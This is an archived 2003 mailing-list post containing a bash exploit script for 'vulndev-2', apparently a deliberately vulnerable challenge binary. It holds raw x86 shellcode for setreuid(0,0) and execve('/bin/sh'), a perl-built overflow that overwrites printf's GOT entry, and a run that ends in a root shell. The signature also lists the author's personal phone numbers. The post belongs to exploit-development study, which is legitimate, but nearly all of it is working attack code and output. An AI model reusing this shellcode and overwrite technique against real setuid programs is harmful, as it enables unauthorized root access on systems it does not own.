[je@vudo ~]$ cat>expldev-2.sh<<EOF #!/bin/bash # # Linux/x86 exploit for vulndev-2 # # Defeats non-executable stack / heap & randomized stack base # # 2003-05-23 - Joel Eriksson (je at 0xbadc0ded.org) # shellcode=` # setreuid(0, 0) printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80" # execve("/bin/sh", "/bin/sh", NULL) printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80" ` buf_size=90 # size of buffer pad_size=2 # align to word boundary num_reps=32 # &bfp - buf may be > BFSIZE (padding/alignment) addr=0x$(objdump -R vulndev-2 | awk '$3 == "printf" { print $1 }') arg1=$(perl -e 'print "A"x('$buf_size+$pad_size') . pack("L", '$[addr-2]')x'$num_reps) arg2=$(perl -e 'print pack("L", '$[addr+4]')')$shellcode rm -f db.log ; ./vulndev-2 $arg1 $arg2 exit 0 EOF [je@vudo ~]$ ./expldev-2.sh sh-2.05b# whoami root sh-2.05b# -- Joel Eriksson <jeat_private> ------------------------------------------------- Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37 Security Research & Systems Development at Bitnux PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1 A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1 -------------------------------------------------
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 14:01:59 PDT